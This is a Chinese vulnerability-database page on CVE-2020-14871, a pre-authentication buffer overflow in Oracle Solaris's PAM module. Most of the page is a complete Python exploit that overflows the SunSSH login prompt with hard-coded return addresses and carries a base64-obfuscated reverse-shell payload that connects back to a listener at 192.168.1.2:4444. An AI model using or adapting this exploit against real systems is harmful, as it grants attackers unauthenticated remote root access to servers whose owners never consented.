文章目录[隐藏]
Oracle Solaris 安全漏洞
漏洞ID | 2202644 | 漏洞类型 | 缓冲区错误 |
发布时间 | 2021-05-22 | 更新时间 | 2021-06-24 |
CVE编号 | CVE-2020-14871 | CNNVD-ID | CNNVD-202010-918 |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
Oracle Solaris是美国甲骨文(Oracle)公司的一套UNIX操作系统。 Oracle Solaris 可插入身份验证模块10版本,11版本存在安全漏洞,该漏洞允许未经身份验证攻击者通过多种协议进行网络访问,从而危害Oracle Solaris。尽管此漏洞位于Oracle Solaris中,但攻击可能会严重影响其他产品。
|漏洞EXP
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
# Original Exploit Author: Hacker Fantastic
# Metasploit Module Author: wvu
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
# Version: 10
# Tested on: SunOS solaris 10
# CVE: CVE-2020-14871
# Ported By: legend
import socket
import paramiko
from time import sleep
payload = b"A"*516+ b"\x04\x39\xbb\xfe" + b"\x19\xf8\xf0\x14" + b"\x01\x01\x04\x08" + b"\x07\xba\x05\x08" + b"\xd0\x56\xbb\xfe" + b"\xdf\x1e\xc2\xfe" + b"\x8c\x60\xfe\x56" + b"\xf1\xe3\xc3\xfe"
payload+=b"python${IFS}-c${IFS}\""
# msfvenom -p python/shell_reverse_tcp -b "\x00\x09\x20" LHOST=192.168.1.2 LPORT=4444
payload+=b"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCBhcyBzCmltcG9ydCBzdWJwcm9jZXNzIGFzIHIKc289cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pCnNvLmNvbm5lY3QoKCcxOTIuMTY4LjEuMicsNDQ0NCkpCndoaWxlIFRydWU6CglkPXNvLnJlY3YoMTAyNCkKCWlmIGxlbihkKT09MDoKCQlicmVhawoJcD1yLlBvcGVuKGQsc2hlbGw9VHJ1ZSxzdGRpbj1yLlBJUEUsc3Rkb3V0PXIuUElQRSxzdGRlcnI9ci5QSVBFKQoJbz1wLnN0ZG91dC5yZWFkKCkrcC5zdGRlcnIucmVhZCgpCglzby5zZW5kKG8pCg==')[0]))"
payload+=b"\""
print("Length => %d" % (len(payload)))
def inter_handler(title, instructions, prompt_list):
resp = [] #Initialize the response container
for pr in prompt_list:
print(pr)
if pr[0].startswith('Please enter user name:'):
sleep(10)
resp.append(payload)
print("Your payload is sended check your nc")
return tuple(resp)
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.2", 22))
ts = paramiko.Transport(sock)
ts.start_client(timeout=10)
ts.auth_interactive(username="", handler=inter_handler)
|参考资料
来源:www.oracle.com
链接:https://www.oracle.com/security-alerts/cpuoct2020.html
本文由 华域联盟 原创撰写:华域联盟 » Oracle Solaris 安全漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/95757.htm